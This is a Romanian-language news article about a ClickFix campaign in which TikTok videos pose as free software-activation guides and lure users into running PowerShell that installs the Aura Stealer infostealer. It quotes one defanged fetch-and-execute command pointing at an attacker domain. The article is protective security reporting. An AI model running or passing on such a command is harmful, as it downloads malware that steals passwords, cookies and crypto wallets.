O nouă campanie de atacuri informatice folosește videoclipuri TikTok pentru a răspândi malware de tip „infostealer”, sub pretextul oferirii unor ghiduri gratuite pentru activarea diferitelor programe populare. Această metodă, cunoscută sub numele de ClickFix, devine tot mai frecventă, punând în pericol datele utilizatorilor. Experții în securitate cibernetică avertizează asupra riscurilor acestei tehnici de infiltrare.

Campania reia o metodă documentată anterior de Trend Micro în luna mai și implică videoclipuri care oferă instrucțiuni aparent legitime pentru activarea software-ului. În realitate, aceste clipuri conving utilizatorii să execute comenzi PowerShell periculoase, ce pot duce la infectarea sistemelor. De obicei, fiecare videoclip afișează o comandă scurtă, precum „iex (irm slmgr[.]win/photoshop)”, și solicită rularea ca administrator.

După executarea comenzii, sistemul stabilește o conexiune cu un site compromis, de unde descarcă scripturi și fișiere malițioase. Primul fișier, updater.exe, este o variantă a malware-ului Aura Stealer, folosit pentru a colecta și transmite date sensibile, precum parole, cookie-uri, portofele de criptomonede și informații de autentificare. Cel de-al doilea fișier, source.exe, descarcă și compilează cod, dar scopul final rămâne necunoscut.

Riscurile pentru utilizatori sunt semnificative, în special dacă comanda a fost executată fără precauție. Experții recomandă schimbarea imediată a parolelor și activarea autentificării în doi pași atunci când este posibil. În plus, pentru a preveni astfel de atacuri, specialiștii avertizează împotriva copiatului și rulării direct a comenzilor din videoclipuri sau site-uri necunoscute.

Atacurile ClickFix devin o amenințare în creștere, fiind folosite pentru distribuirea diverselor tipuri de malware, inclusiv ransomware și programe de furt de criptomonede. Este esențial ca utilizatorii să fie informați și să monitorizeze evoluția tehnicilor de hacking pentru a se proteja eficient împotriva acestor riscuri. Într-un mediu digital în continuă schimbare, cunoașterea și vigilenta rămân cele mai eficiente arme de apărare.